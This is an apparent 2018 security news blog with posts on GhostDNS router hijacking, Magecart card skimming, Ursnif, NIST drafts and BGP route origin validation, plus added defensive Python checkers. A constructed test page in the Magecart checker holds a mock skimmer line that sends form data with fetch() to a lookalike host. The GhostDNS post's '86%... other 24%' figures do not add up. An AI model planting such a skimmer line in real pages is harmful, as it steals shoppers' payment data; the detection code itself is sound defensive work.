BLOG

GhostDNS: 100,000 Infected Routers

Several research labs have been releasing their findings on a new take on DNSChanger. A new router-based exploit known as GhostDNS appears to be made up of three variations of DNSChanger. By using Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger, GhostDNS can infect over 70 different router models. However, GhostDNS is more than the sum of its DNSChanger components: analysts have also identified that it includes a web admin module, a Rogue DNS module, and a phishing module.

GhostDNS scans the internet looking for routers it can exploit through a vulnerability or weak security, using its Shell, JavaScript, Python and PHP scripts to attack poorly secured web administration consoles and deploy its payload. The primary purpose is to change the device's DNS settings to forward traffic to Rogue DNS servers. Once this is done, when the unsuspecting user attempts to visit various web services, they are redirected to phishing landing pages for those services. Banking portals, telecoms, ISPs and Netflix appear to be among the most common phishing targets of this malware.

While there has been some disagreement about the time frame this campaign has been running, it is widely agreed that the campaign has infected over 100,000 routers, with 86% located in Brazil. The other 24% have been reported across other South American countries. The DNS redirection service known as Rogue DNS has been detected on many notable cloud services such as Amazon, OVH, Google, Telefonica, and Oracle, but researchers have been in contact with the larger networks and ISPs to shut down the network.

The GhostDNS payload can deliver over 100 scripts via remote access or by utilizing exploits, and can attack hardware from older HP (3Com), A-Link, Alcatel / Technicolor, Antena, C3-Tech, Cisco, D-Link, Elsys, Fiberhome, Fiberlink, Geneko, Greatek, Huawei, Intelbras, Kaiomy, LinkOne, MikroTik, MPI Networks, Multilaser, OIWTECH, Perfect, Qtech, Ralink, Roteador, Sapido, Secutech, Siemens, Technic, Tenda, Thomson, TP-Link, Ubiquiti, Viking, ZTE, and Zyxel routers.

Analysts have some advice on how not to become a victim of this kind of attack. It is recommended that you update your firmware to the latest version available for your router and use complex, strong passwords. Consider disabling web administration on your device. Finally, hardcode your DNS settings to use only trusted DNS servers in both your router and OS.
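As an added example (not code from the original post or from the researchers it cites), a small Python check in the spirit of the last recommendation: it flags configured resolvers that are not on an explicit allowlist, and flags domains whose answers from the local (router-provided) resolver share nothing with a trusted resolver's answers, which is the redirection GhostDNS relies on. The allowlist, the resolv.conf content and the answer sets are all constructed for the example.

```python
# Added example, not from the original post: flag resolver settings outside an
# allowlist and compare answers from two resolvers, the redirection GhostDNS relies on.
import ipaddress

# Hypothetical allowlist: the trusted resolvers an organisation has chosen.
TRUSTED_RESOLVERS = {"9.9.9.9", "1.1.1.1"}

# Constructed /etc/resolv.conf-style content as a host behind a hijacked router might see it.
SAMPLE_RESOLV_CONF = """\
# generated by DHCP
nameserver 203.0.113.45
nameserver 1.1.1.1
search example.test
"""

def parse_nameservers(resolv_conf: str) -> list:
    """Return the nameserver addresses listed in resolv.conf-style text."""
    servers = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                servers.append(str(ipaddress.ip_address(parts[1])))
            except ValueError:
                continue  # skip malformed entries
    return servers

def untrusted_resolvers(resolv_conf: str, trusted=TRUSTED_RESOLVERS) -> list:
    """Resolvers present in the config that are not on the allowlist."""
    return [s for s in parse_nameservers(resolv_conf) if s not in trusted]

def suspicious_domains(local_answers: dict, trusted_answers: dict) -> list:
    """Domains whose A records from the local resolver share nothing with the
    trusted resolver's answers. CDNs rotate addresses, so only a complete
    disjunction is treated as a redirection indicator."""
    flagged = []
    for domain, local in local_answers.items():
        trusted = trusted_answers.get(domain, set())
        if trusted and not (set(local) & set(trusted)):
            flagged.append(domain)
    return sorted(flagged)

# Constructed answer sets: the bank hostname resolves differently through the router-provided resolver.
LOCAL_ANSWERS = {"bank.example": {"198.51.100.7"}, "news.example": {"192.0.2.10", "192.0.2.11"}}
TRUSTED_ANSWERS = {"bank.example": {"192.0.2.50"}, "news.example": {"192.0.2.11"}}

if __name__ == "__main__":
    print("untrusted resolvers:", untrusted_resolvers(SAMPLE_RESOLV_CONF))
    print("suspicious domains:", suspicious_domains(LOCAL_ANSWERS, TRUSTED_ANSWERS))
```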

Sources
https://thehackernews.com/2018/10/ghostdns-botnet-routerhacking.html
https://www.theregister.co.uk/2018/10/02/ghostdns_router_hacking/
http://blog.netlab.360.com/70-different-types-of-home-routers-alltogether-100000-are-being-hijacked-by-ghostdns-en/
Fri, 05 Oct 2018 18:30:00 +0000

Supply Chain Issue

The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies

Here is a great article on supply chain security on the Bloomberg site. The article is here.

Thu, 04 Oct 2018 18:47:00 +0000

Facebook Breach


FTC Issues Alert on Recent Facebook Breach

10/03/2018 01:30 PM EDT

 

Original release date: October 03, 2018

The Federal Trade Commission (FTC) has released an alert to provide Facebook users with recommended precautions against identity theft after the recent breach of the Facebook social media platform.

NCCIC encourages users and administrators to review the FTC Alert and the NCCIC Tip on Preventing and Responding to Identity Theft. If you believe you are a victim of identity theft, visit the FTC's identity theft website to make a report.

Wed, 03 Oct 2018 19:31:00 +0000

2018 NY Metro Joint Cyber Security WEBINAR

October 18th WEBINAR

The 2018 NY Metro Joint Cyber Security WEBINAR will take place on Thursday October 18th. NYMJCSC is now in its fifth year; featuring keynotes, panels and sessions aimed at various aspects of information security and technology.

This year will feature a webinar format allowing NYMJCSC to reach and educate a broader audience.


Time Slot   | Topic                                                                                                                                   | Speaker
2:00 - 2:40 | Behavior-based Internal Controls that Prevent Ransomware, Employee Theft, and Denial of Service attacks                                 | Jeffrey Wagar
2:45 - 3:25 | Cyber Risk: It's All About People                                                                                                       | Alan Brill
3:30 - 4:10 | Cyber Dogfighting: Hacker Decision-Making and the Korean Air War                                                                        | Mathew J. Heath Van Horn
4:15 - 4:55 | Assessing Legal and Contractual Risk and Uncertainty with Bug Bounty Programs, Vulnerability Disclosures and Information Sharing        | Mark H. Francis
4:50 - 5:30 | "Not If but When?" - Leveraging AI to Jettison Mantras of the Past: How AI will Liberate Security of the Future                          | John McClurg




Register Here for the Webinar on Thursday, October 18th

Tue, 02 Oct 2018 21:22:00 +0000

Security baseline (DRAFT) for Windows 10 v1809 and Windows Server 2019

Microsoft is pleased to announce the draft release of the security configuration baseline settings for Windows 10 version 1809 (a.k.a. "Redstone 5" or "RS5") and for Windows Server 2019. Please evaluate these proposed baselines and send us your feedback via blog comments below.

Download the content here: Windows-10-1809-Security-Baseline-DRAFT.zip

The downloadable attachment to this blog post includes importable GPOs, a PowerShell script for applying the GPOs to local policy, custom ADMX files for Group Policy settings, documentation in spreadsheet form and as a Policy Analyzer file (MSFT-Win10-v1809-RS5-WS2019-DRAFT.PolicyRules). In this release, we have changed the documentation layout in a few ways:


Highlights of the differences from past baselines, which are listed in BaselineDiffs-to-v1809-RS5-DRAFT.xlsx:

See the rest of the changes here

Tue, 02 Oct 2018 21:19:00 +0000

NIST final public draft Special Publication 800-37, Revision 2


NIST announces the final public draft of Special Publication 800-37, Revision 2, Risk Management Framework for Information Systems and Organizations: A System Life Cycle Approach for Security and Privacy.

There are seven major objectives for this update:


The addition of the Prepare step is one of the key changes to the RMF—incorporated to achieve more effective, efficient, and cost-effective security and privacy risk management processes.

In addition to seeking your comments on this final public draft, we are specifically seeking feedback on a new RMF Task P-13, Information Life Cycle. The life cycle describes the stages through which information passes, typically characterized as creation or collection, processing, dissemination, use, storage, and disposition, including destruction and deletion. Identifying and understanding all stages of the information life cycle has significant implications for security and privacy. We are seeking comment on how organizations would execute this task and how we might provide the most helpful discussion to assist organizations in its execution.

The public comment period for the draft publication is October 2 through October 31. Please submit comments using the comment template to sec-cert@nist.gov.

Tue, 02 Oct 2018 16:13:00 +0000

Great article about Malware and Small Businesses

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now we’re seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.
In social engineering attacks, is less really more?
A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents were then distributed via email to target victims in the cities where those businesses are located.
With Windows Defender AV’s next gen defense, however, the size of the attack doesn’t really matter.
Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

To read the full article on the Microsoft site, go here.

Thu, 27 Sep 2018 14:33:00 +0000

Introducing Microsoft Learn


Microsoft announced the launch of more than 80 hours of learning for Azure, Dynamics 365, Power BI, PowerApps, and Microsoft Flow. The new learning platform includes experiences that will help you, your customers, and partners to up-level your skills, prepare for new role-based certification exams, and explore additional training offerings such as instructor-led training and Pluralsight. Check out www.microsoft.com/learn

Highlights include:

Role-based certifications and training

Microsoft introduced new role-based certifications, starting with 3 new roles: Microsoft Certified Azure Developer, Microsoft Certified Azure Administrator and Microsoft Certified Azure Solutions Architect, with additional roles to follow. The launch of these certifications also includes new exams and updated instructor-led training to prepare for these exams. Learn more: http://aka.ms/RoleBasedCert


Tue, 25 Sep 2018 21:10:00 +0000

Magecart? Again?

I don’t like writing breach stories because they occur far too often. On the other hand, when the breach is the fault of the sales merchant, one hopes exposure would cause a renewed interest in other merchants to better secure their retail websites to assure such data loss doesn’t happen to them.
With the number of breaches so large, how easily we forget that back in June Magecart applied a kind of cross-site scripting (XSS) attack to digitally skim the credit card information Ticketmaster buyers used for payment. In defense of Ticketmaster, the actual attack appeared to be a code insertion compromise against Inbenta, a third-party supplier for their website. Although obfuscated, and having no impact on the site's functionality, the subtle change captured and diverted the information to Magecart-owned servers with legitimate-looking names.

This attack was nothing new to Magecart, who has been behind such attacks since 2015 and focuses on e-commerce. At the time of the Ticketmaster breach, RiskIQ believed, based on its analysis, that over 800 other commerce websites were also targeted. Clearly Magecart continued with attacks, as evidenced by the large compromise of British Airways (which lost over 380,000 transactions). One might imagine that other, smaller sites are also being targeted, based on the announcement just this week that ABS-CBN (whose online store was compromised) may have lost information on 213 customers.

You'd think that with such publicity, e-commerce sites, especially those with a large customer base, would be watching for similar Magecart activity to assure they don't fall victim. Or not. Per Threatpost yesterday, "Newegg is a top online merchant with tens of millions of registered users in 50 countries, according to its website. It sells a range of consumer electronics, entertainment, smart-home and gaming products, and is the 161st most popular site in the U.S. according to Alexa. In all, it receives more than 50 million site visitors per month. And between Aug. 14 and Sept. 18, a Magecart-linked payment skimmer was active on the Newegg site". Like the attacks on the other e-commerce sites, with an elegant injection of only 8 lines of code (similar to the code used in the British Airways incident but improved), Magecart diverted information to a domain with a legitimate Comodo-issued certificate called neweggstats[.]com. In its analysis of these attacks, RiskIQ further states: "Magecart attacks are surging—RiskIQ's automatic detections of instances of Magecart breaches pings us almost hourly."

Who’s to blame for these breaches? Clearly web service providers in the e-commerce arena need to improve their approaches to security. How many sites have been compromised? Perhaps there are some we may never know about, but for many more, my guess is we will learn about them in the near future as e-commerce providers take a closer look at their websites for some unauthorized Magecart additions. 
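The common thread in the Ticketmaster, British Airways and Newegg cases above is a small script change that sends payment data to a host the checkout page never used before. As an added example (not code from any of the cited sources), the Python below is the kind of baseline check a merchant can run against its own checkout page: it flags script hosts outside an allowlist, including URLs inside inline scripts, and flags supplier scripts whose content no longer matches a recorded hash. The page, the hosts and the baseline hash are all constructed.

```python
# Added example, not from the cited sources: baseline check for a checkout page
# that flags script hosts outside an allowlist and third-party scripts whose
# content no longer matches a known SHA-256. All inputs are constructed.
import hashlib
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the checkout page is expected to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>', re.I | re.S)
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')

def script_hosts(html: str) -> set:
    """Hosts referenced by <script src=...> plus any URL inside inline scripts."""
    hosts = set()
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host:
            hosts.add(host)
    for body in INLINE_SCRIPT_RE.findall(html):
        hosts.update(h.lower() for h in URL_RE.findall(body))
    return hosts

def unexpected_hosts(html: str, allowed=ALLOWED_SCRIPT_HOSTS) -> list:
    """Script hosts on the page that are not on the allowlist."""
    return sorted(script_hosts(html) - allowed)

def changed_scripts(fetched: dict, baseline: dict) -> list:
    """Script URLs whose SHA-256 differs from the recorded baseline."""
    changed = []
    for url, content in fetched.items():
        digest = hashlib.sha256(content.encode()).hexdigest()
        if baseline.get(url) != digest:
            changed.append(url)
    return sorted(changed)

# Constructed checkout page: one expected supplier script and one inline
# addition that sends form data to a host the page never used before.
SAMPLE_HTML = """<html><body>
<script src="https://cdn.example/checkout.js"></script>
<script>window.addEventListener('submit', () => fetch('https://stats.example-lookalike.test/c'));</script>
</body></html>"""

# Constructed supplier script, the hash recorded when it was last reviewed, and a modified copy.
BASELINE_CONTENT = "function pay(){/* original supplier code */}"
BASELINE = {"https://cdn.example/checkout.js": hashlib.sha256(BASELINE_CONTENT.encode()).hexdigest()}
FETCHED = {"https://cdn.example/checkout.js": BASELINE_CONTENT + "/* appended */"}
```

Running `unexpected_hosts(SAMPLE_HTML)` and `changed_scripts(FETCHED, BASELINE)` on the constructed inputs reports the lookalike host and the altered supplier script respectively.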
Sources:
https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/
https://www.computerworlduk.com/security/magecart-who-what-is-behindbritish-airways-attack-3683768/
https://threatpost.com/magecart-strikes-againsiphoning-payment-info-from-newegg/137576/

This article was created by Peraton
Fri, 21 Sep 2018 18:33:00 +0000

Draft Cybersecurity Practice Guide SP 1800-14, Protecting the Integrity of Internet Routing: Border Gateway Protocol (BGP) Route Origin Validation, is Available for Comment


It is difficult to overstate the importance of the internet to modern business and society in general. The internet is not a single network, but rather a complex grid of independent interconnected networks that relies on a protocol known as Border Gateway Protocol (BGP) to route traffic to its intended destination.

Unfortunately, BGP was not designed with security in mind, and a route hijack attack can deny access to internet services, misdeliver traffic to malicious endpoints, and cause routing instability. A technique known as BGP route origin validation (ROV) is designed to protect against route hijacking.

NIST’s National Cybersecurity Center of Excellence (NCCoE), together with several technology vendors, has developed proof-of-concept demonstrations of BGP ROV implementation designed to improve the security of the internet's routing infrastructure. 
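To make the ROV decision concrete, here is an added example (not part of the NIST guide or any vendor's implementation) that applies the route origin validation procedure from RFC 6811 to a small constructed set of Route Origin Authorizations (ROAs). Each ROA states which AS may originate a prefix and the longest prefix length it covers; the prefixes and AS numbers used are documentation ranges.

```python
# Added example, not from the NIST guide: the RFC 6811 route origin validation
# decision over a constructed set of ROAs (prefix, maxLength, origin AS).
import ipaddress

# Constructed ROAs using documentation prefixes and private-use AS numbers.
ROAS = [
    ("192.0.2.0/24", 24, 64496),
    ("198.51.100.0/22", 24, 64497),
    ("2001:db8::/32", 48, 64496),
]

def covers(roa_prefix: str, announced: str) -> bool:
    """True when the announced prefix lies within the ROA prefix."""
    r = ipaddress.ip_network(roa_prefix)
    a = ipaddress.ip_network(announced)
    return r.version == a.version and a.subnet_of(r)

def validate_route(prefix: str, origin_as: int, roas=ROAS) -> str:
    """Return 'valid', 'invalid' or 'notfound' per RFC 6811 section 2.
    valid:    some covering ROA matches both the origin AS and the maxLength
    invalid:  covering ROAs exist but none matches (wrong AS or too-specific)
    notfound: no ROA covers the announced prefix at all"""
    announced = ipaddress.ip_network(prefix)
    covered = False
    for roa_prefix, max_len, asn in roas:
        if not covers(roa_prefix, prefix):
            continue
        covered = True
        if asn == origin_as and announced.prefixlen <= max_len:
            return "valid"
    return "invalid" if covered else "notfound"

if __name__ == "__main__":
    # An origin AS with no ROA for 192.0.2.0/24 is classed invalid; a /25 under
    # a ROA with maxLength 24 is also invalid even from the authorized AS.
    for route in [("192.0.2.0/24", 64496), ("192.0.2.0/24", 64511),
                  ("198.51.100.0/25", 64497), ("203.0.113.0/24", 64500)]:
        print(route, validate_route(*route))
```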

Comments for this draft are due by October 15, 2018. To review Draft Special Publication (SP) 1800-14, and for information on submitting comments, please visit the links below.

CSRC Update: https://csrc.nist.gov/news/2018/nist-requests-comments-on-draft-sp-1800-14 
Publication details: https://csrc.nist.gov/publications/detail/sp/1800-14/draft 
Project Homepage: https://www.nccoe.nist.gov/projects/building-blocks/secure-inter-domain-routing 

Sat, 15 Sep 2018 15:59:00 +0000